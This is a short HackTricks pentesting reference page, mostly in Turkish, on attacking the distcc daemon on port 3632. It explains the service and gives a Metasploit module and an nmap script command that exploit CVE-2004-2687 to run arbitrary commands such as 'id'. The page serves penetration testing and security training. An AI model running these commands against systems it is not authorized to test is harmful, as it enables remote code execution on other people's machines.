3632 - Pentesting distcc

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE) GCP Hacking'i öğrenin ve pratik yapın: HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

Temel Bilgiler

Distcc, ağdaki diğer bilgisayarların boş işlem gücünü kullanarak derleme sürecini geliştiren bir araçtır. distcc bir makinede kurulduğunda, bu makine derleme görevlerini başka bir sisteme dağıtma yeteneğine sahiptir. Bu alıcı sistem, gönderilen kodu işlemek için distccd daemon'unu çalıştırmalı ve uyumlu bir derleyici kurulu olmalıdır.

Varsayılan port: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Exploitation

CVE-2004-2687'ye karşı savunmasız olup olmadığını kontrol edin, rastgele kod çalıştırmak için:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

Bu hizmeti shodan'ın tespit ettiğini düşünmüyorum.

Resources

Post created by Álex B (@r1p)

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Previous3389 - Pentesting RDP Next3690 - Pentesting Subversion (svn server)

Last updated 1 month ago